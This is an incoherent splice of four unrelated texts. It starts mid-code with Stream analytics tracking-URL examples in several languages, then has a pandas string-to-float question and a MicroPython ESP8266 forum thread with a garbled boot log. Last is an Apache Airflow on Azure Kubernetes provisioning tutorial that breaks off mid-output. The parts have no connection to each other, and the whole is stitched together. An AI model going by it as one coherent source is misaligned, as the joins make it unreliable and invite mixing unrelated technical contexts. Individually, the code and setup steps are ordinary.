'content_list': ['tweet:1', 'tweet:2', 'tweet:3'],
'user_data': 'tommaso',
'location': 'email',
'feed_id': 'user:global'
}
engagement = {
'content': 'tweet:2',
'label': 'click',
'position': 1,
'user_data': 'tommaso',
'location': 'email',
'feed_id': 'user:global'
}
events = [impression, engagement]
tracking_url = client.create_redirect_url(target_url, user_id, events)
# when the user opens the tracking url in their browser, they get redirected to the target url
# the events are added to our analytics platform
$client = new GetStream\Stream\Client('', 'YOUR_API_SECRET');
// the url to redirect to
$targetUrl = 'http://my.application.com/page/';
$impression = [
'content_list' => ['tweet:34349698', 'tweet:34349699', 'tweet:34349697'],
'feed_id' => 'flat:tommaso',
'location' => 'profile_page',
'user_data' => ['id' => 'bubbles'],
'label' => 'impression',
];
$engagement = [
'content' => 'tweet:34349698',
'feed_id' => 'flat:tommaso',
'location' => 'profile_page',
'user_data' => ['id' => 'frank'],
'label' => 'click',
];
$events = [$impression, $engagement];
$trackingUrl = $client->createRedirectUrl($targetUrl, $events);
// when the user opens the tracking url in their browser, they get redirected to the target url
// the events are added to our analytics platform
// the URL to direct to
URL targetURL = new URL("http://mysite.com/detail");
// track the impressions and a click
List<Impression> impressions = Lists.newArrayList(Impression.builder()
.contentList(new Content("tweet:1"),
new Content("tweet:2"),
new Content("tweet:3"))
.userData(new UserData("tommaso", null))
.location("email")
.feedID("user:global")
.build());
List<Engagement> engagements = Lists.newArrayList(Engagement.builder()
.content(new Content("tweet:2"))
.label("click")
.position(1)
.userData(new UserData("tommaso", null))
.location("email")
.feedID("user:global")
.build());
// when the user opens the tracking URL in their browser, they get redirected to the target URL
// the events are added to our analytics platform
URL trackingURL = client.analytics().createRedirectURL(targetURL, impressions, engagements);
// the URL to direct to
targetURL := "http://mysite.com/detail"
// track the impressions and a click
impression := ImpressionEventsData{}.
WithForeignIDs("tweet:1", "tweet:2", "tweet:3").
WithUserData(NewUserData().String("tommaso")).
WithLocation("email").
WithFeedID("user:global")
engagement := EngagementEvent{}.
WithForeignID("tweet:2").
WithLabel("click").
WithPosition(1).
WithUserData(NewUserData().String("tommaso")).
WithLocation("email").
WithFeedID("user:global")
trackingURL, err := client.Analytics().RedirectAndTrack(targetURL, impression, engagement)
if err != nil {
panic(err)
}
// when the user opens the tracking URL in their browser, they get redirected to the target URL
// the events are added to our analytics platform
In the code above, when a user clicks the tracking URL, they are re-directed to the specified target URL. During the re-direct, Stream tracks the impressions and engagement events you specified.
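As an illustrative sketch of how the generated link might then be used (the HTML snippet and the placeholder URL value below are assumptions, not part of the Stream API):
# Embed the previously generated tracking_url in the email body; clicking the
# link records the impression/engagement events and then redirects the user.
tracking_url = "https://analytics.example.com/redirect?..."  # value returned by createRedirectUrl
email_body = (
    '<p>You have new activity:</p>'
    '<a href="{url}">View the post</a>'.format(url=tracking_url)
)
print(email_body)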
|
Hi, I have this code:
kucoin = requests.get('https://api.kucoin.com/v1/open/tick')
kuc = pd.DataFrame(kucoin.json()['data']).sort_values(['symbol'])
b = kuc.loc[kuc['symbol'].isin(pairskucbtc), ['sell']].to_string(index=False, header=None)
The data comes back in str format, but I need float for arithmetic calculations. How do I convert it? I tried adding
pd.options.display.float_format = '{:,.8f}'.format
or
to_string(index=False, header=None, float.format=True)
But the data type still remains str. The data output is:
0.02340240.02342410.2523452..
many rows. I need to turn all these strings into numbers. The data output without to_string() is:
sell189 0.00029322197 0.00005053136 0.11209140258 0.00008497
With an index and a header, which I don't need.
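One possible way to avoid the string round-trip entirely (a sketch under the assumption that kuc is the DataFrame from the question and pairskucbtc is the asker's own list) is to keep the column numeric with pd.to_numeric instead of formatting it with to_string():
import pandas as pd
import requests

kucoin = requests.get('https://api.kucoin.com/v1/open/tick')
kuc = pd.DataFrame(kucoin.json()['data']).sort_values(['symbol'])

# pairskucbtc is the asker's own list of symbols; the value here is a placeholder
pairskucbtc = ['BTC-USDT']

# to_numeric converts the str values to floats, ready for arithmetic
sell = pd.to_numeric(kuc.loc[kuc['symbol'].isin(pairskucbtc), 'sell'])
b = sell.tolist()  # plain Python floats, no index or header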
|
kobertkirk wrote: When can we expect floating point operations to be added?
I've seen appropriate commits on github, last one yesterday: https://github.com/micropython/micropyt ... its/master
Didn't run any tests though. Still fiddling with the toolchain.
Guys, I'd like to remind that the official release is in 2 months, so that's the best answer to questions "when feature X will be available" (of core features, stretch-goal features will take more time after that).
With that reminded, we started to spool source code to the master branch - while, as KS updates says, taking a chance to refactor and clean up it. To give you an idea, UART REPL handling went thru 3 incarnations. The original socket module is one I quickly put up 1 year ago (sic!) to test my idea of how to have BSD-compatible sockets on top of lwIP (without bringing in a full-fledged RTOS). I then spent quite a time discussing this idea with other ESP8266 hackers inviting them to see where my reasoning is wrong and why it can't work, but nobody was interested. I'm grateful to
GalenHZ who accepted the challenge and developed fully independent implementation based on these ideas, to prove its viability. Well, we started with my module still as known-working, and then gradually switched to GalenHZ's modlwip, discovered and fixed bunch of issues with it and added more features (few fixes are already in the mainline, as it's a chore to keep them in a separate branch). Do we need 3 REPLs and 2 socket modules? Apparently no. When someone submits questionable code, I'm the first to suggest: "This code looks like one we can add, and then soon remove again, then why, please do it right". Then the only choice is to apply the same treatment to our own code, and uphold the high testimonies MicroPython already received for its code quality.
Another point - new ESP8266 port depends on other components, first of all esp-open-sdk. There're bunch of changes to do to it too to make port easily buildable (while we just did multi-step manual setup, which for sure will be error-prone to many people). I've just added https://github.com/pfalcon/esp-open-lwip as a submodule to esp-open-sdk, yet need to integrate it completely into build process. And over last month, there was already bunch of changes to it, so if you didn't rebuild for awhile, I suggest you rebuild it from scratch (make clean; make). Then be ready to rebuild it again as it progresses.
But again, source is getting there. If you possess the required skills, we welcome you to build, run, test it. Automated testsuite support is one of the biggest changes the project brings - now we know that there're not just features, but that they actually work (or will work soon; or eventually). Floating point support works great for us, with a small caveat - there's slightly less precision than on PyBoard, to accommodate less memory and lack of HW FP on ESP8266. Try it
pfalcon wrote: Try it
mad474 wrote: Done! Running
MicroPython v1.6-136-g98b727c on 2016-03-05; ESP module with ESP8266
on an "old" ESP8266 ESP-01.
https://youtu.be/tlZ4FiQR5U0
You guys really rock!
Thanks! Out of curiosity, did you use OSX or Linux to build the stuff? I tried yesterday with OSX but I struggled compiling the toolchain and I gave up.
Code:
MicroPython v1.6-128-g5788499 on 2016-03-05; ESP module with ESP8266
Type "help()" for more information.
>>> 2+4
6
>>> help()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name not defined
>>> import pyb
>>> pyb
<module 'pyb'>
>>> dir(pyb)
['__name__', 'info', 'freq', 'millis', 'elapsed_millis', 'micros', 'elapsed_micros', 'delay', 'udelay', 'sync', 'hard_reset', 'Pin', 'ADC', 'RTC']
>>> help(pyb)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name not defined
>>>
Downloaded on linux and compile without problems.
Yes Frida is my watchdog!
Frida wrote: First download on a esp8266-01 today.
I have the same problem as Frida. Downloaded the pre-compiled firmware from Adafruit and flashed it onto ESP-01. NameError as above, for any command.
Code:
MicroPython v1.6-128-g5788499 on 2016-03-05; ESP module with ESP8266
Type "help()" for more information.
>>> help()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
NameError: name not defined
>>>
Downloaded on linux and compile without problems.
@electronicsguy
I'm using the one from github, and not that one from Adafruit.
If you look, it can do 2+4=6, it was only the help that is not working yet.
Wait till they are ready to release the first version to the public, or try to compile it yourself.
Yes Frida is my watchdog!
So the Alpha4 has been released, thanks!
Unfortunately, on my machine webrepl doesn't seem to work (whereas V3 did). I erased flash before updating, just to make sure, but with the same results. I'm on Adafruit's Huzzah Board.
Here is the traceback from an example session - ideas?
Code:
>>> import webrepl as w
>>> w.start()
WebREPL daemon started on 192.168.4.1:8266
>>> # I refresh the browser window here
WebREPL connection from: ('192.168.4.2', 52279)
NLR jump failed
ets Jan 8 2013,rst cause:2, boot mode:(3,0)
load 0x40100000, len 30596, room 16
tail 4
chksum 0x8b
load 0x3ffe8000, len 980, room 4
tail 0
chksum 0x5f
load 0x3ffe83e0, len 2652, room 8
tail 4
chksum 0x9c
csum 0x9c
␎␌␌l��|��␒rrnb��␌l��␂␌b�l␌b쌜���l�r�␌b␌�lrldon't use rtc mem data
␎l␌l��|��␒rrnb��ll��␌�b�␌b쌜��␂␂�␂␌b�␌�lrl␎�␌l��|��␒rrnb��l␌���pp␌�␌␌b쌜��␂�␌�␌b�lb␎lrl��rl���b␌l�br|�␌b␌ll␌��␜�lb��n�␒nn�␐␂␌␂�l�|␂�l␌�␌l��l�␞���␞��l`␂�␂n�␀���b␌␌�␌�b␌␂␂���b␌l�b�␎lrlr�n��␀�␌��n����␂bp␂b�����␌�␞␐b���|�␌��lrl␂��␂ln�prl␎�␌l��could not open file 'boot.py' for reading
could not open file 'main.py' for reading
#4 ets_task(401002a8, 3, 3fff5148, 4)
MicroPython v1.7-205-gb69d1fc on 2016-04-22; ESP module with ESP8266
Type "help()" for more information.
|
Key Takeaways
Selecting the right data orchestration tool is important due to differences and trade-offs between the variety of options for building distributed data pipelines.
Apache Airflow is one of the most popular and widely adopted OSS projects for programmatic orchestration of data workflows
Main Airflow concepts include Directed Acyclic Graph, scheduler, webserver, executor, and metadata database
You can provision a distributed Airflow setup in a cloud-agnostic environment, as well as in the cloud on Azure, AWS, and GCP.
Data pipelines, movement, workflows, transformation, and ETL have always been important for a broad range of businesses. Data pipeline tools can be grouped into several categories:
Simple utilities, such as cron, excellent for trivial data pipelines.
Platform-specific tools, or cloud-based managed services, such as AWS Glue or Data Pipeline, or Azure Data Factory, providing tight integration with specific products, moving data between them.
Open-source projects, such as Apache Airflow, Apache Oozie or Azkaban, Dagster, Prefect, offering flexibility, extensibility, and rich programmable control flow.
What is covered in this article
In this article, I am focusing on Apache Airflow as one of the most flexible, extensible, and popular in the community projects for reliable and scalable data and AI pipelines. I will cover:
Key Apache Airflow concepts and why use it in distributed setting
General architecture for Apache Airflow environment in the cloud
Detailed guide for provisioning Apache Airflow on Kubernetes on Azure
Apache Airflow: Key Concepts
Airflow is based on the following concepts and components:
DAG (Directed Acyclic Graph) - a set of tasks and dependencies between them, defined using Python code (a minimal sketch follows this list).
Scheduler - discovers the DAGs that are ready to be triggered according to the associated schedule. When the scheduler discovers task failures, it can optionally retry the DAG a certain number of times.
Webserver - a handy UI interface for viewing, scheduling, or triggering DAGs, offering useful information on task success or failure status, progress, duration, retries, logs, and more.
Executor - component that runs a task, assigns it to a specific node, and updates other components of its progress.
Metadata database - where Airflow can store metadata, configuration, and information on task progress.
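As a minimal sketch of the DAG concept mentioned above (the DAG id, task names, and schedule are illustrative assumptions, written in the Airflow 1.10 style matched by this article's CLI commands):
from datetime import datetime, timedelta

from airflow import DAG
from airflow.operators.bash_operator import BashOperator

default_args = {
    'owner': 'airflow',
    'retries': 1,
    'retry_delay': timedelta(minutes=5),
}

# A DAG is just Python code: tasks plus the dependencies between them.
dag = DAG(
    dag_id='example_hello_dag',
    default_args=default_args,
    start_date=datetime(2020, 1, 1),
    schedule_interval='@daily',
)

extract = BashOperator(task_id='extract', bash_command='echo extracting', dag=dag)
load = BashOperator(task_id='load', bash_command='echo loading', dag=dag)

# The scheduler triggers 'load' only after 'extract' has succeeded.
extract >> load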
Scalable data workflows with Airflow on Kubernetes
Airflow can be run on a single-machine or in a distributed mode, to keep up with the scale of data pipelines.
Airflow can be distributed with Celery - a component that uses task queues as a mechanism to distribute work across machines. There is a requirement to have a number of nodes running up front to schedule tasks across them. Celery is deployed as an extra component in your system and requires a message transport to send and receive messages, such as Redis or RabbitMQ.
Airflow supports Kubernetes as a distributed executor. It doesn't require any additional components, like Redis. The Kubernetes executor doesn't need to always keep a certain number of workers alive, as it creates a new pod for every job.
General architecture of Apache Airflow environment in the cloud
Figure 1. Cloud-agnostic architecture.
Figure 2. Azure architecture.
Figure 3. GCP and AWS architectures.
Provisioning Apache Airflow on Kubernetes in the cloud
To get started, you will need access to a cloud subscription, such as Azure, AWS, or Google Cloud. The example in this article is based on Azure, however, you should be able to successfully follow the same steps for AWS or GCP with minor changes.
To follow the example on Azure, feel free to create an account, and install Azure CLI or use Azure Portal to create necessary resources. If using Azure CLI, don’t forget to login and initialize your session with subscription ID:
az login
az account set --subscription <subscription-id>
To make sure you can easily delete all the resources at once after giving it a try, create an Azure Resource Group that will serve as a grouping unit:
RESOURCE_GROUP_NAME="airflow"
REGION="East US"
az group create --name $RESOURCE_GROUP_NAME --location "$REGION"
After you are done with resources, feel free to delete the entire resource group:
az group delete --name $RESOURCE_GROUP_NAME
PostgreSQL
For Apache Airflow, a database is required to store metadata information about the status of tasks. Airflow is built to work with a metadata database through SQLAlchemy abstraction layer. SQLAlchemy is a Python SQL toolkit and Object Relational Mapper. Any database that supports SQLAlchemy should work with Airflow. MySQL or PostgreSQL are some of the most common choices.
To create and successfully connect to an instance of PostgreSQL on Azure, please follow detailed instructions here.
Feel free to use the same resource group name and location for the PostgreSQL instance. Make sure to indicate a unique server name. I chose GP_Gen5_2 as instance size, as 2 vCores and 100 GB of storage is more than enough for the example, but feel free to pick the size that fits your own requirements.
It is important to remember what your PostgreSQL server name, fully qualified domain name, username, and password are. This information will be required during the next steps. Note: you can get a fully qualified domain name by looking at the fullyQualifiedDomainName after executing the command:
POSTGRESQL_SERVER_NAME="<your-server-name>"
az postgres server show --resource-group $RESOURCE_GROUP_NAME --name $POSTGRESQL_SERVER_NAME
# example value of fullyQualifiedDomainName on Azure: airflowazuredb.postgres.database.azure.com
Check connection to your database using PSQL:
P_USER_NAME="your-postgres-username"
psql --host=$POSTGRESQL_SERVER_NAME.postgres.database.azure.com --port=5432 --username=$P_USER_NAME@$POSTGRESQL_SERVER_NAME --dbname=postgres
File Share
When running data management workflows, we need to store Apache Airflow Directed Acyclic Graph (DAG) definitions somewhere. When running Apache Airflow locally, we can store them in a local filesystem directory and point to it through the configuration file. When running Airflow in a Docker container (either locally or in the cloud), we have several options.
Storing data pipeline DAGs directly within the container image. The downside of this approach is when there is a possibility and likelihood of frequent changes to DAGs. This would imply the necessity to rebuild the image each time your DAGs change.
Storing DAG definitions in a remote Git repository. When there are changes within DAG definitions, using Git-Sync sidecar can automatically synchronize the repository with the volume in your container.
Storing DAGs in a shared remote location, such as remote filesystem. Same as with a remote Git repository, we can mount a remote filesystem to a volume in our container and mirror DAG changes automatically. Kubernetes supports a variety of CSI drivers for many remote filesystems, including Azure Files, AWS Elastic File System, or Google Cloud Filestore. This approach is great if you also want to store logs somewhere in a remote location.
I am using Azure Files for storing DAG definitions. To create an Azure fileshare, execute the following commands:
STORAGE_ACCOUNT="storage-account-name"
FILESHARE_NAME="fileshare-name"
az storage account create \
--resource-group $RESOURCE_GROUP_NAME \
--name $STORAGE_ACCOUNT \
--kind StorageV2 \
--sku Standard_ZRS \
--output none
STORAGE_ACCOUNT_KEY=$(az storage account keys list \
--resource-group $RESOURCE_GROUP_NAME \
--account-name $STORAGE_ACCOUNT \
--query "[0].value" | tr -d '"')
az storage share create \
--account-name $STORAGE_ACCOUNT \
--account-key $STORAGE_ACCOUNT_KEY \
--name $FILESHARE_NAME \
--quota 1024 \
--output none
For Azure Files, detailed creation instructions are located here. Feel free to create a fileshare on any of the other platforms to follow along.
After the fileshare is created, you can copy one or several DAGs you might have to your newly created storage. If you don't have any DAGs yet, you can use one of those available online - for example, the DAG called airflow_tutorial_v01 from one of the GitHub repositories, which you can also find here.
To copy files to Azure Files share, you can use Azure Portal, or AzCopy util for programmatic operations.
Kubernetes cluster
For Apache Airflow scheduler, UI, and executor workers, we need to create a cluster. For Azure Kubernetes Service, detailed cluster creation instructions are here. Make sure to indicate that you’d like the cluster to be provisioned in a Virtual Network (default installation doesn’t include it). I created the cluster with Azure Portal with 3 nodes of size Standard DS2 v2 in East US, with RBAC enabled, and the following network configuration:
Figure 4. Kubernetes Cluster Network Configuration.
Azure Portal has an amazing feature to help you connect to your cluster. On the AKS cluster resource, click Connect at the top, and follow the instructions.
Allow cluster to access database
To make sure the AKS cluster can communicate with the PostgreSQL on Azure database, we need to add a service endpoint on the AKS Virtual Network side and a Virtual Network rule on the PostgreSQL side.
Go to the AKS virtual network resource in Azure Portal, it’s located in the same resource group where the cluster is. Under Service Endpoints settings menu, select Add, and choose Microsoft.SQL from the dropdown:
Figure 5. Add a Service Endpoint to the Virtual Network.
Go to the PostgreSQL on Azure resource, and under Connection Security settings menu VNET rules section, select Add existing virtual network. Specify a name for the Virtual Network rule, select your subscription and the AKS Virtual Network. These actions will make sure Apache Airflow pods on AKS are able to communicate with the database successfully.
Figure 6. Add a Virtual Network Rule.
Prepare the fileshare to be used within Kubernetes
Install a CSI driver corresponding to your platform. For Azure, follow instructions to install Azure Files CSI driver.
Create a secret to store Azure storage account name and key (make sure STORAGE_ACCOUNT and STORAGE_ACCOUNT_KEY contain your own values for storage account name and key). This secret will be used later in Persistent Volumes definitions for DAGs and logs.
kubectl create secret generic azure-secret --from-literal accountname=$STORAGE_ACCOUNT --from-literal accountkey=$STORAGE_ACCOUNT_KEY --type=Opaque
Prepare resource files to run Airflow components on Kubernetes
Figure 7. List of Resource Definition Files.
You can clone the GitHub repository to get these files. Before you apply them to your own clusters, make sure to review them and read through the notes in this article, as there are quite a few values that might need to be customized.
Note: I initially got the files from the official Airflow GitHub repository here. I ran the helm template command to generate YAML files and deleted those that weren’t relevant for this use case. My GitHub repository now contains all the necessary files adjusted for this scenario, so you can skip the helm template step if you’d like to use & modify files under my repository.
Namespace
Having a namespace is a good way to identify resources that belong to the same logical group. In this case, we can create a namespace to assign to all resources relevant for our Apache Airflow setup. This is especially convenient for distinguishing groups of resources when there are multiple components living within the same cluster.
Definition of the namespace for all Airflow resources is in the airflow-namespace.yaml file on GitHub.
Create the namespace:
kubectl create -f airflow-namespace.yaml
Make sure to remember to use the right namespace name when creating other resources for Airflow. We will be using airflow-on-k8s in this guide.
Persistent Volumes for logs and DAGs
As one of the ways to work with storage within the cluster, there is a resource called Persistent Volumes. Its goal is to abstract away the details of the underlying storage provider it corresponds to, be it a shared network file system, external volume, or other cloud-specific storage type. Persistent Volume resource is configured with connection information or settings that would define how the cluster will connect to and work with the storage. Persistent Volume lifecycle is independent, and doesn’t have to be attached to the lifecycle of a pod that uses it.
In this case, we need an abstraction to represent storage for DAG definitions and for log files. Definition of a Persistent Volume resource for DAGs is in pv-azurefile-csi.yaml file on GitHub. Definition of a Persistent Volume resource for logs is in pv-azurefile-csi-logs.yaml file on GitHub.
Open pv-azurefile-csi.yaml and pv-azurefile-csi-logs.yaml files to edit them to include your own fileshare name and storage account name. If you followed the steps above, assign the parameter shareName to the value of $FILESHARE_NAME variable, and parameter server to the value of $STORAGE_ACCOUNT.file.core.windows.net.
If you are not using Azure, make sure to change the CSI driver settings to correspond to AWS, GCP, or any other platform. Don’t forget to create any necessary secrets to store sensitive data corresponding to the fileshare system you are using.
Create persistent volumes:
kubectl create -f pv/pv-azurefile-csi.yaml
kubectl create -f pv/pv-azurefile-csi-logs.yaml
Persistent Volume Claims for logs and DAGs
In addition to Persistent Volumes as a storage abstraction, we also have an abstraction that represents a request for storage, called Persistent Volume Claim. The goal of Persistent Volume Claim is to represent a specific pod’s request for storage combined with specific details, such as exact amount of storage, and access mode.
We need to create Persistent Volume Claims for DAGs and logs, to make sure pods that interact with storage can use these claims to request access to the storage (Azure Files in this case).
Definition of a Persistent Volume Claim resource for DAGs is in pvc-azurefile-csi-static.yaml file on GitHub. Definition of a Persistent Volume Claim resource for logs is in pvc-azurefile-csi-static-logs.yaml file on GitHub.
Create persistent volume claims:
kubectl create -f pv/pvc-azurefile-csi-static.yaml
kubectl create -f pv/pvc-azurefile-csi-static-logs.yaml
After a few minutes, make sure your Persistent Volume Claims are in Bound state:
$ kubectl get pvc -n airflow-on-k8s
NAME STATUS VOLUME CAPACITY ACCESS MODES
dags-pvc Bound dags-pv 10Gi RWX
logs-pvc Bound logs-pv 10Gi RWX
Service Accounts for scheduler and workers
To allow certain processes perform certain tasks, there is a notion of Service Accounts. For example, we’d like to make sure Airflow scheduler is able to programmatically create, view, and manage pod resources for workers. To ensure this is possible, we need to create a Service Account for each component we want to grant certain privileges to. Later, we can associate the Service Accounts with Cluster Roles by using Cluster Rolebindings.
Create the service accounts:
kubectl create -f scheduler/scheduler-serviceaccount.yaml
kubectl create -f workers/worker-serviceaccount.yaml
Cluster Role for scheduler and workers to dynamically operate pods
A Cluster Role represents a set of rules or permissions.
Definition of the Cluster Role we want to create is in the pod-launcher-role.yaml file on GitHub.
Create the cluster role:
kubectl create -f rbac/pod-launcher-role.yaml
Cluster Role Binding for scheduler and workers
A Cluster Rolebinding is a connection between a Cluster Role and accounts that need it.
Definition of the Cluster Role is in the pod-launcher-rolebinding.yaml file on GitHub.
Create the cluster role binding:
kubectl create -f rbac/pod-launcher-rolebinding.yaml
Secrets
Secrets is a mechanism for managing sensitive data, such as tokens, passwords, or keys that other resources in the cluster may require.
Note: if you configure the secret through a manifest (JSON or YAML) file which has the secret data encoded as base64, sharing this file or checking it into a source repository means the secret is compromised. Base64 encoding is not an encryption method and is considered the same as plain text.
Apache Airflow needs to know what is the fernet key and how to connect to the metadata database. We will use secrets to represent this information.
Fernet key
Apache Airflow requires a fernet key to make sure it can secure connection information that isn't protected by default.
Start Python shell:
$ python
Python 3.7.5 (default, Nov 1 2019, 02:16:32)
[Clang 11.0.0 (clang-1100.0.33.8)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>>
Generate fernet key from Python shell:
from cryptography.fernet import Fernet
fernet_key= Fernet.generate_key()
print('Generated fernet key: ', fernet_key.decode())
Example output of this command is:
Generated fernet key: ESqYUmi27Udn6wxY83KoM9kuvt9rDcelghHbAgGZW9g=
Convert the value to the base64 encoded value:
$ echo -n "<your-generated-fernet-key-value>" | base64
Example output (it will be the value we will use for fernet-key within fernet-secret.yaml file in this example):
Slk0OThJbHE4R0xRNEFuRlJWT3FUR3lBeDg3bG5BWWhEdWx1ekhHX2RJQT0=
Definition of Fernet Key secret is in the fernet-secret.yaml file on GitHub.
Replace the value of the fernet-key parameter in the file with your generated fernet-key value.
Create the fernet secret:
kubectl create -f secrets/fernet-secret.yaml
Database connection information
Prepare your PostgreSQL database connection. Generally, it follows the format of:
postgresql+psycopg2://user:password@hostname:5432/dbname
Note: when using Azure Database for PostgreSQL, the connection string requires the user to be in the format user@host, where the @ sign should be escaped as %40 (more details):
postgresql+psycopg2://user%40host:password@host.postgres.database.azure.com:5432/dbname
Encode your connection string using base64 (replace airflowuser with your username, airflowpassword with your password, airflowhost with your host, and airflow with your database name):
# For general PostgreSQL
echo -n "postgresql+psycopg2://airflowuser:airflowpassword@airflowhost.postgres.database.azure.com:5432/airflow" | base64
# For Azure PostgreSQL
echo -n "postgresql+psycopg2://airflowuser%40airflowhost:airflowpassword@airflowhost.postgres.database.azure.com:5432/airflow" | base64
Example output (this will be the value we will use for connection within metadata-connection-secret.yaml file in this example):
cG9zdGdyZXNxbCtwc3ljb3BnMjovL2xlbmElNDBhaXJmbG93YXp1cmVkYjpQYXNzd29yZDEhQGFpcmZsb3dhenVyZWRiLnBvc3RncmVzLmRhdGFiYXNlLmF6dXJlLmNvbTo1NDMyL3Bvc3RncmVz
Definition of the connection secret is in the metadata-connection-secret.yaml file on GitHub.
Replace the value of the connection parameter in the file with your base64-encoded connection value.
Create the Airflow connection metadata secret:
kubectl create -f secrets/metadata-connection-secret.yaml
Config Map
A Config Map is a resource that allows storing non-sensitive data in a key-value format. This is convenient for any type of configuration settings. Since Apache Airflow generally requires a configuration file called airflow.cfg, we can use a Config Map to populate it with important parameters. For example:
* dags_folder points to the folder within a pod that can be used to access DAGs mounted from remote storage.
* dags_in_image setting can be True or False. If False it will look at mounted volumes or git repository to find DAGs.
* dags_volume_claim is the name of the Persistent Volume Claim for DAGs.
* Settings that start with git_ are relevant if you’re planning to use Git repository to sync DAGs.
* worker_service_account_name can be used to set the name of the worker service account, and so on.
Definition of Config Map is in the configmap.yaml file on GitHub.
Note: there are quite a few key-value pairs that can be adjusted in the Config Map, so if you're doing a lot of experimentation, feel free to tweak some of them. However, also be sure to appropriately modify the necessary resource files, as many of the values in the Config Map will affect other resources.
Create config map:
kubectl create -f configmap.yaml
StatsD
StatsD is a process that listens for various statistics, such as counters and timers. Apache Airflow has built-in support for StatsD and uses its Python client to expose metrics. StatsD receives information from Airflow about the number of job successes or failures, the number of jobs waiting in line for execution, and so on. If you're interested in specific types of metrics, take a look at this page.
Create StatsD resources:
kubectl create -f statsd/statsd-deployment.yaml
kubectl create -f statsd/statsd-service.yaml
Check the status of the StatsD instance and get its TCP port:
kubectl get services -n airflow-on-k8s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
statsd ClusterIP 10.0.9.199 <none> 9125/UDP,9102/TCP 24h
Map the StatsD instance to local port (for example 7000):
kubectl port-forward service/statsd 7000:9102 -n airflow-on-k8s
Output:
Forwarding from 127.0.0.1:7000 -> 9102
Forwarding from [::1]:7000 -> 9102
Open the 127.0.0.1:7000 page in your browser to see StatsD main page or metrics page:
Figure 8. StatsD metrics page
Scheduler
Scheduler is one of the main components behind Apache Airflow.
From documentation: > The Airflow scheduler monitors all tasks and all DAGs and triggers the Task instances whose dependencies have been met. Behind the scenes, it spins up a subprocess, which monitors and stays in sync with a folder for all DAG objects it may contain, and periodically (every minute or so) collects DAG parsing results and inspects active tasks to see whether they can be triggered.
Definition of the Scheduler deployment is in scheduler-deployment.yaml file on GitHub.
Create scheduler deployment:
kubectl create -f scheduler/scheduler-deployment.yaml
Webserver
Webserver and UI component of Apache Airflow enables us to kickstart, schedule, monitor, and troubleshoot our data pipelines, as well as many other convenient functions.
If you’d like the Webserver to have an external IP, replace ClusterIP with LoadBalancer in the webserver-service.yaml, and you will be able to access from the outside of the cluster without proxies or port forwarding.
Create webserver deployment and service:
kubectl create -f webserver/webserver-deployment.yaml
kubectl create -f webserver/webserver-service.yaml
Check the status of the Airflow UI instance and get its TCP port:
kubectl get services -n airflow-on-k8s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
statsd ClusterIP 10.0.9.199 <none> 9125/UDP,9102/TCP 24h
webserver ClusterIP 10.0.9.175 <none> 8080:31003/TCP 19h
Map the Airflow UI instance to local port (for example 8080):
kubectl port-forward service/webserver 8080:8080 -n airflow-on-k8s
Output:
Forwarding from 127.0.0.1:8080 -> 8080
Forwarding from [::1]:8080 -> 8080
Open the 127.0.0.1:8080 page in your browser to see the Airflow UI page.
If you’d like to create a new user for Airflow Webserver, you can connect to the webserver pod:
$ kubectl exec --stdin --tty webserver-647fdcb7c-4qkx9 -n airflow-on-k8s -- /bin/bash
airflow@webserver-647fdcb7c-4qkx9:/opt/airflow$
And create a user from Airflow CLI. Replace USERNAME, PASSWORD, FIRSTNAME, LASTNAME, EMAIL, ROLE with your own values. Note: existing Airflow roles can be one of the following - Admin, User, Op, Viewer, and Public:
airflow create_user -u USERNAME -p PASSWORD -f FIRSTNAME -l LASTNAME -e EMAIL -r ROLE
Example output:
[2020-08-08 00:00:40,140] {__init__.py:51} INFO - Using executor KubernetesExecutor
[2020-08-08 00:00:40,143] {dagbag.py:396} INFO - Filling up the DagBag from /opt/airflow/dags
[2020-08-08 00:00:41,834] {security.py:475} INFO - Start syncing user roles.
[2020-08-08 00:00:42,458] {security.py:385} INFO - Fetching a set of all permission, view_menu from FAB meta-table
[2020-08-08 00:00:42,833] {security.py:328} INFO - Cleaning faulty perms
Viewer user newuser created.
Afterward, you can log in to Airflow UI with credentials of any of the users you have provisioned. You should see a page displaying Airflow DAGs:
Figure 9. Airflow UI showing DAGs
You can further explore the Graph View, Tree View, logs, and other details of any particular DAGs if you click on it.
Figure 10. Airflow UI - Logs
Checking health of resources provisioned
Check if scheduler, webserver, and statsd deployments are in a healthy state:
$ kubectl get deployments -n airflow-on-k8s
NAME READY UP-TO-DATE AVAILABLE AGE
scheduler 1/1 1 1 123m
statsd 1/1 1 1 24h
webserver 1/1 1 1 122m
Check if all corresponding pods are healthy:
$ kubectl get po -n airflow-on-k8s
NAME READY STATUS RESTARTS AGE
scheduler-7584f4b4b7-5zhvw 2/2 Running 0 125m
statsd-d6d5bcd7c-dg26n 1/1 Running 0 24h
webserver-647fdcb7c-4qkx9 1/1 Running 0 124m
Check status/events of any particular pod (scheduler-7584f4b4b7-5zhvw pod in this example):
$ kubectl describe pod scheduler-7584f4b4b7-5zhvw -n airflow-on-k8s
Check pod logs (where the -c parameter refers to the name of the container we want to check on, scheduler in this case):
kubectl logs scheduler-7584f4b4b7-5zhvw -n airflow-on-k8s -c scheduler
Check logs from init-container of a pod (where -c parameter refers to the name of init-container we want to check on, run-airflow-migrations in this case):
$ kubectl logs scheduler-7584f4b4b7-5zhvw -n airflow-on-k8s -c run-airflow-migrations
Connect to a pod to execute commands from within (webserver-647fdcb7c-4qkx9 pod in this example):
kubectl exec --stdin --tty webserver-647fdcb7c-4qkx9 -n airflow-on-k8s -- /bin/bash
After getting connected, we can execute commands (for example check the dags directory):
airflow@webserver-647fdcb7c-4qkx9:/opt/airflow$ cd dags
airflow@webserver-647fdcb7c-4qkx9:/opt/airflow/dags$ ls
__pycache__ dag_processor_manager dags first-dag.py hello_dag.py hello_world.py outfile scheduler
Overview of resources created
We can see which resources are running in the cluster by running the following command:
kubectl get all -n airflow-on-k8s
NAME READY STATUS RESTARTS AGE
pod/scheduler-7584f4b4b7-jdfzl 2/2 Running 0 13m
pod/statsd-d6d5bcd7c-mjdm7 1/1 Running 0 17m
pod/webserver-647fdcb7c-ft72t 1/1 Running 0 8m26s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
